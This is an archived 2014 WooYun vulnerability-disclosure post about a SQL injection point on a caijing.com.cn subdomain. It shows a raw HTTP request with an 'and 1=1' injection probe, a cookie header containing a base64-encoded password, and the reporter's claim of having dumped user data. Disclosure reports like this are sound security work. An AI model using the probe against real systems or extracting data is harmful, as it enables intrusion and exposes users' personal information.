乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-01-06: 细节已通知厂商并且等待厂商处理中 2014-01-11: 厂商已经主动忽略漏洞,细节向公众公开
rt
看到前面那个走了小厂商流程,感觉不科学,我只是没有爆表而已嘛,涉及的数据还是蛮多的。于是不甘心,在找了个注入点http://t.caijing.com.cn/bq/?bqid=187抓包数据
GET /bq/?bqid=663%20and%201=1 HTTP/1.1Host: t.caijing.com.cnUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: __utma=114738197.1746900344.1387729153.1388580033.1388835670.4; __utmz=114738197.1388835670.4.3.utmcsr=tongji.baidu.com|utmccn=(referral)|utmcmd=referral|utmcct=/web/welcome/login; Hm_lvt_b0bfb2d8ed2ed295c7354d304ad369f1=1387549340,1387708558,1387729409,1388835670; cj_cms_iploc=CN3100_20131215133402572; SA_USER_USER_SCHOLARSHIP=1; LOGOUT_FLAG=1; JishiGou_qUBe90_auth=d1acn%2FF3vvWtIZ2oONUFScH6Q8rDrH3HWKBmlt84iqka7gyF5lMgU%2FWtQIRHnhZIssioyiXB6foD1O%2FzG3tYmM3EboE; SA_USER_NICK_NAME=wqer; [email protected]; SA_USER_USER_PWD=MTIzcXdl; SA_USER_USER_TYPE=0; SA_USER_USER_ACTIVE=1; UID=6546358; Hm_lpvt_b0bfb2d8ed2ed295c7354d304ad369f1=1388835816; __utmb=114738197.17.10.1388835670; __utmc=114738197; GUID=978384137; lastTime=1388835807090; firstTime=1388835807090; point=1388851199000; GID30=978384137Connection: keep-aliveCache-Control: max-age=0
然后没啥好说的。
超详细信息哟。89个字段的信息量你说有多详细?我只是dump了一点点数据哟。 管理能不能把我前面那个也升级为大厂商啊。最后求这个不要小厂商了。。
求送礼物,
危害等级:无影响厂商忽略
忽略时间:2014-01-11 18:45
暂无